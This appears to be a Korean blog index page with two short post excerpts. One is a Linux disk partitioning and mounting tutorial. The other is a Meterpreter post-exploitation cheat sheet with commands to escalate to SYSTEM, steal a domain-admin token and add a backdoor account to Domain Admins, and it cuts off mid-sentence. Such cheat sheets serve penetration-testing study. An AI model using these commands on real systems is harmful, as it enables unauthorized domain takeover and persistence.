2020/02/29
-
linux ) 저장매체 디렉토리에 연결 [mount ]Linux 2020. 2. 29. 11:51
fdisk -l //현재 파티션 및 저장매체들 확인 df //마운트된 것들 확인 파티션 설정 및 포맷==== fdisk /dev/sdb 파티션콘솔___start n primary partition num:default 1 enter,enter p //info of partition w // save and exit 파티션콘솔___end df -T //마운트 된것들 파일시스템 타입도 같이 확인 blkid //마운트 안된 디스크 파티션들도 파일시스템타입 확인 mkfs -t filesystem /dev/sdb1 //파티션 파일시스템으로 포맷 mount /dev/sdb1 /media/test_mnt //대망의 마운트 과정 ✌ 추가=== mount , cat /etc/mtab //마운트 정보 cat /etc/fs..
-
post exploit카테고리 없음 2020. 2. 29. 08:02
■ 미터프리터(meterpreter) 포스트 익스플로잇(post exploit) 명령 미터프리터를 사용하여 윈도우 기반 시스템의 권한을 상승한다.meterpreter> use privmeterpreter> getsystem 주어진 프로세스 ID에서 도메인 관리자 토큰을 훔쳐 도메인 계정을 추가하고 해당 계정을 도메인 관리 그룹으로 지정한다. meterpreter> psmeterpreter> steal_token 1784meterpreter> shellc:\windows\system32> net user metasploit p@55w0rd /ADD /DOMAINc:\windows\system32> net group "Domain Admin" metasploit /ADD /DOMAIN SAM 데이터베이스에서..